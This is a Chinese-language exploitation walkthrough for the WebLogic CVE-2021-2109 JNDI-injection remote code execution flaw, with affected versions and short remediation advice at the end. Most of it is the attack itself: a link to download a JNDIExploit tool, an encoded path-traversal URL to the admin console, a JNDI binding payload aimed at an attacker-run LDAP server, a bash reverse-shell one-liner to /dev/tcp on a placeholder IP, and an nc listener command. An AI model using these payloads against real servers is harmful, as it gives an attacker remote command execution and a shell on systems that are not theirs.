Weblogic_LDAP RCE（CVE-2021-2109）

一、漏洞描述

WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入，导致攻击者可利用此漏洞远程代码执行。

二、影响版本

• Weblogic Server 10.3.6.0.0
• Weblogic Server 12.1.3.0.0
• Weblogic Server 12.2.1.3.0
• Weblogic Server 12.2.1.4.0
• Weblogic Server 14.1.1.0.0

三、测试过程

JNDIExploit工具

 链接：https://www.aliyundrive.com/s/SmvpPzcv1mF
 提取码：4hf5

 路径拼接：http://x.x.x.x:7000/console/css/%252e%252e%252f/consolejndi.portal

出现该界面说明漏洞存在，启动LDAP，构造数据包。

payload：

 _pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/Basic/WeblogicEcho;AdminServer%22)

正常情况是如下图所示：

真实环境未开启该服务，结果如下图所示

接下来通过bash -i 反弹shell及bash编码

 bash -i >& /dev/tcp/xx.xx.xx.xx/1122 0>&1   (ip为接收shell的ip)

nc监听

 nc -lvvp 1122  (端口自己定)

在bp上抓包发送数据，发现反弹成功 (字段cmd后为编码过后的反弹shell命令)

四、修复建议

1、建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。

2、由于是通过JNDI注入进行远程命令执行，所以受到JDK版本的影响，建议升级Weblogic Server运行环境的JDK版本.